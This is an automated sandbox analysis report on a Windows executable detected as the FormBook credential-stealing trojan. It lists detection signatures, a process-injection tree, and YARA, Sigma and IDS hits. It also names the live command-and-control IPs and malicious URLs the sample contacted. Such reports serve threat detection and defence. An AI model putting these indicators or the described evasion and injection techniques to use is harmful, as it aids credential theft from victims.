Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scanned-IMGS_from NomanGroup IDT.scr.exe

Overview

General Information

Sample name:Scanned-IMGS_from NomanGroup IDT.scr.exe
Analysis ID:1590590
MD5:17cbb82b7db7a77df6507dd32af10563
SHA1:816fc79a0d8dc1ea493779e01f21f99c00a9229d
SHA256:744a3efa374159a40ea07cf1c6a295f40fef90685421d20ceda619847dbe6165
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Scanned-IMGS_from NomanGroup IDT.scr.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe" MD5: 17CBB82B7DB7A77DF6507DD32AF10563)
    • svchost.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • zalkpCfMwtnpQo.exe (PID: 4856 cmdline: "C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • verclsid.exe (PID: 7608 cmdline: "C:\Windows\SysWOW64\verclsid.exe" MD5: 190A347DF06F8486F193ADA0E90B49C5)
          • zalkpCfMwtnpQo.exe (PID: 4944 cmdline: "C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7948 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", CommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", CommandLine|base64offset|contains: 6j, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", ParentImage: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, ParentProcessId: 7520, ParentProcessName: Scanned-IMGS_from NomanGroup IDT.scr.exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", ProcessId: 7540, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", CommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", CommandLine|base64offset|contains: 6j, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", ParentImage: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, ParentProcessId: 7520, ParentProcessName: Scanned-IMGS_from NomanGroup IDT.scr.exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", ProcessId: 7540, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-14T10:24:28.619902+010028554651A Network Trojan was detected192.168.2.44922313.248.169.4880TCP
                2025-01-14T10:25:01.443609+010028554651A Network Trojan was detected192.168.2.457343206.119.82.17280TCP
                2025-01-14T10:25:14.747221+010028554651A Network Trojan was detected192.168.2.45742767.223.117.14280TCP
                2025-01-14T10:25:28.132064+010028554651A Network Trojan was detected192.168.2.457512162.0.215.24480TCP
                2025-01-14T10:25:41.405894+010028554651A Network Trojan was detected192.168.2.4575833.33.130.19080TCP
                2025-01-14T10:26:03.413361+010028554651A Network Trojan was detected192.168.2.45760338.47.233.5280TCP
                2025-01-14T10:26:16.567525+010028554651A Network Trojan was detected192.168.2.457607104.21.3.19380TCP
                2025-01-14T10:26:29.699619+010028554651A Network Trojan was detected192.168.2.4576113.33.130.19080TCP
                2025-01-14T10:26:43.767121+010028554651A Network Trojan was detected192.168.2.45761520.244.96.6580TCP
                2025-01-14T10:27:05.120371+010028554651A Network Trojan was detected192.168.2.45761984.32.84.3280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-14T10:24:53.839685+010028554641A Network Trojan was detected192.168.2.457319206.119.82.17280TCP
                2025-01-14T10:24:56.387302+010028554641A Network Trojan was detected192.168.2.457320206.119.82.17280TCP
                2025-01-14T10:24:58.924134+010028554641A Network Trojan was detected192.168.2.457327206.119.82.17280TCP
                2025-01-14T10:25:07.096702+010028554641A Network Trojan was detected192.168.2.45737467.223.117.14280TCP
                2025-01-14T10:25:09.625077+010028554641A Network Trojan was detected192.168.2.45739567.223.117.14280TCP
                2025-01-14T10:25:12.197696+010028554641A Network Trojan was detected192.168.2.45741167.223.117.14280TCP
                2025-01-14T10:25:20.684968+010028554641A Network Trojan was detected192.168.2.457463162.0.215.24480TCP
                2025-01-14T10:25:23.176391+010028554641A Network Trojan was detected192.168.2.457479162.0.215.24480TCP
                2025-01-14T10:25:25.619691+010028554641A Network Trojan was detected192.168.2.457496162.0.215.24480TCP
                2025-01-14T10:25:33.752152+010028554641A Network Trojan was detected192.168.2.4575443.33.130.19080TCP
                2025-01-14T10:25:36.292105+010028554641A Network Trojan was detected192.168.2.4575573.33.130.19080TCP
                2025-01-14T10:25:38.843157+010028554641A Network Trojan was detected192.168.2.4575703.33.130.19080TCP
                2025-01-14T10:25:55.782922+010028554641A Network Trojan was detected192.168.2.45760038.47.233.5280TCP
                2025-01-14T10:25:58.319121+010028554641A Network Trojan was detected192.168.2.45760138.47.233.5280TCP
                2025-01-14T10:26:00.896051+010028554641A Network Trojan was detected192.168.2.45760238.47.233.5280TCP
                2025-01-14T10:26:08.910903+010028554641A Network Trojan was detected192.168.2.457604104.21.3.19380TCP
                2025-01-14T10:26:12.082025+010028554641A Network Trojan was detected192.168.2.457605104.21.3.19380TCP
                2025-01-14T10:26:14.006169+010028554641A Network Trojan was detected192.168.2.457606104.21.3.19380TCP
                2025-01-14T10:26:22.054349+010028554641A Network Trojan was detected192.168.2.4576083.33.130.19080TCP
                2025-01-14T10:26:24.615122+010028554641A Network Trojan was detected192.168.2.4576093.33.130.19080TCP
                2025-01-14T10:26:27.168370+010028554641A Network Trojan was detected192.168.2.4576103.33.130.19080TCP
                2025-01-14T10:26:36.262702+010028554641A Network Trojan was detected192.168.2.45761220.244.96.6580TCP
                2025-01-14T10:26:38.809818+010028554641A Network Trojan was detected192.168.2.45761320.244.96.6580TCP
                2025-01-14T10:26:41.356459+010028554641A Network Trojan was detected192.168.2.45761420.244.96.6580TCP
                2025-01-14T10:26:57.375175+010028554641A Network Trojan was detected192.168.2.45761684.32.84.3280TCP
                2025-01-14T10:26:59.898580+010028554641A Network Trojan was detected192.168.2.45761784.32.84.3280TCP
                2025-01-14T10:27:02.468302+010028554641A Network Trojan was detected192.168.2.45761884.32.84.3280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.nexula.website/ro4w/Avira URL Cloud: Label: malware
                Source: http://www.wddb97.top/p75v/?OvV=2njD6f80EDOLQ8&wz4=GLmvlUrKOeNEevY3wcyfjSkNrwRDbMR2/x32zMvR34mmT0X9ObY05SVA9W4yUMrr2Yq11ERvKU6w2wYb4X7EbFt4LfTn3Wu5NGMirqATx7GUx0yxlSOAJso=Avira URL Cloud: Label: malware
                Source: http://www.7wkto5nk230724z.click/yysf/Avira URL Cloud: Label: malware
                Source: http://www.nexula.website/ro4w/?wz4=c7bs7cBJE/6WeNDz6y7wfs4csA5ai8mWfunIFb5NDUjHoY3en1z9O1W0OakyKWwaCum+/W1z6qbtx3tl+iJ0V9nyUJg4fcAQQsDkMDUAlXZwvkRINEDVO9c=&OvV=2njD6f80EDOLQ8Avira URL Cloud: Label: malware
                Source: http://www.wddb97.top/p75v/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeVirustotal: Detection: 36%Perma Link
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeReversingLabs: Detection: 44%
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1835373056.00000000091A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1830333241.0000000005AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3549362625.0000000004810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeJoe Sandbox ML: detected
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zalkpCfMwtnpQo.exe, 00000002.00000002.3547860890.000000000013E000.00000002.00000001.01000000.00000004.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3547855130.000000000013E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1699361176.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1701122516.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1729825920.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731375904.0000000003700000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1838981604.0000000004EB6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.0000000005060000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1836979825.0000000004D01000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1699361176.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1701122516.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1729825920.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731375904.0000000003700000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000003.00000003.1838981604.0000000004EB6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.0000000005060000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1836979825.0000000004D01000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: verclsid.pdbGCTL source: svchost.exe, 00000001.00000003.1798236689.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829844647.0000000003200000.00000004.00000020.00020000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000002.3548785048.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3550509142.000000000568C000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2126594180.000000000FEAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: verclsid.pdb source: svchost.exe, 00000001.00000003.1798236689.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829844647.0000000003200000.00000004.00000020.00020000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000002.3548785048.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3550509142.000000000568C000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2126594180.000000000FEAC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C68EE FindFirstFileW,FindClose,0_2_004C68EE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_004C698F
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004BD076
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004BD3A9
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C9642
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C979D
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_004C9B2B
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_004BDBBE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_004C5C97
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0303C650 FindFirstFileW,FindNextFileW,FindClose,3_2_0303C650
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 4x nop then xor eax, eax3_2_03029DD0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 4x nop then mov ebx, 00000004h3_2_04E004DF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49223 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57319 -> 206.119.82.172:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57374 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57343 -> 206.119.82.172:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57411 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57463 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57395 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57327 -> 206.119.82.172:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57496 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57512 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57320 -> 206.119.82.172:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57479 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57544 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57557 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57570 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57583 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57600 -> 38.47.233.52:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57611 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57607 -> 104.21.3.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57619 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57601 -> 38.47.233.52:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57427 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57612 -> 20.244.96.65:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57615 -> 20.244.96.65:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57606 -> 104.21.3.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57604 -> 104.21.3.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57616 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57608 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57602 -> 38.47.233.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57618 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57614 -> 20.244.96.65:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57603 -> 38.47.233.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57617 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57613 -> 20.244.96.65:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57610 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57605 -> 104.21.3.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57609 -> 3.33.130.190:80
                Source: global trafficTCP traffic: 192.168.2.4:49221 -> 1.1.1.1:53
                Source: global trafficTCP traffic: 192.168.2.4:57314 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 206.119.82.172 206.119.82.172
                Source: Joe Sandbox ViewIP Address: 67.223.117.142 67.223.117.142
                Source: Joe Sandbox ViewIP Address: 162.0.215.244 162.0.215.244
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004CCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_004CCE44
